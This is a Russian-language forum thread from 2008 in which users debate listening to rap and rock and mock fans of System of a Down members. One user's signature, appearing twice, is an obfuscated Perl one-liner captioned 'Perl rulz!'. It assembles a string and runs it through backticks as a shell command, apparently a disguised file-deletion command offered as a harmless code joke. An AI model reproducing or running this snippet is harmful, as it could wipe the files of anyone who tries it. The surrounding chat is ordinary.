Добавлено: Сб Май 03, 2008 1:39 am Заголовок сообщения:
Sandra
все не могу привыкнуть к новой аве... _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Сб Май 03, 2008 2:29 am Заголовок сообщения:
Darry писал(а):
да ладно,это выбор этих людей,мне лично всё равно кто что думает,и ничьё мнение по поводу музыки менять не стремлюсь. системщик например фанат дарона,ну и пусть,мне от этого как то не жирко не холодно)
Мн ев принципе тоже.....но изза них я не могу сказать что слушаю рэп без косых взглядов и предрассудков. Изза них люди не понимают как это так слушать рэп и рок. И как раз на них срубают бабло большинство музыкантов которые занимаются музыкой чисто изза денег. Я игнорирую охотно вещи если они не сказываются негативно на мне или на моих близких. К сожалению как раз фанатики этим и занимаются. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
Добавлено: Сб Май 03, 2008 2:36 am Заголовок сообщения:
WodkaGT
а тебе не плевать на косые взгляды каких то фанатиков?
нормально слушать реп и рок,а кто не согласен,пускай дальше будет несогласен)я вообще тогда просто ходячий объект атаки для фанатиков потому что слушаю полярно разные направления,и ничего,живу,да и при чем отлично себе живу)плюнь ты на них всех) _________________ Freedom's just another word for nothin' left to lose.
Зарегистрирован: 23.03.2008 Сообщения: 472 Откуда: Москва
Добавлено: Сб Май 03, 2008 10:42 am Заголовок сообщения:
Да вот и я к примеру слушаю ГЕНИЯ и Дарона!!! и к примеру просто талантливого человека Сержа!!! И мне пох на косые взгляды фанатиков (тип фуууу ты Сержа слушаешь) _________________ Верю в систему
Добавлено: Сб Май 03, 2008 4:36 pm Заголовок сообщения:
Darry писал(а):
WodkaGT
а тебе не плевать на косые взгляды каких то фанатиков?
нормально слушать реп и рок,а кто не согласен,пускай дальше будет несогласен)я вообще тогда просто ходячий объект атаки для фанатиков потому что слушаю полярно разные направления,и ничего,живу,да и при чем отлично себе живу)плюнь ты на них всех)
В том то и дело...что мнение фанатиков мне пох. Но изза таких фанатиков у нормальных людей складывается мнение о музыкальных направлениях. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
Добавлено: Сб Май 03, 2008 6:11 pm Заголовок сообщения:
это было первым что я сделал) разные) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Сб Май 03, 2008 7:01 pm Заголовок сообщения:
Он научился пользоваться компом друга. Или нашел дешевое Интернет-Кафе. _________________ And if I die before i wake... LET THE MOTHERSHIP LAND MY SOUL TO TAKE!
Вы не можете начинать темы Вы не можете отвечать на сообщения Вы не можете редактировать свои сообщения Вы не можете удалять свои сообщения Вы не можете голосовать в опросах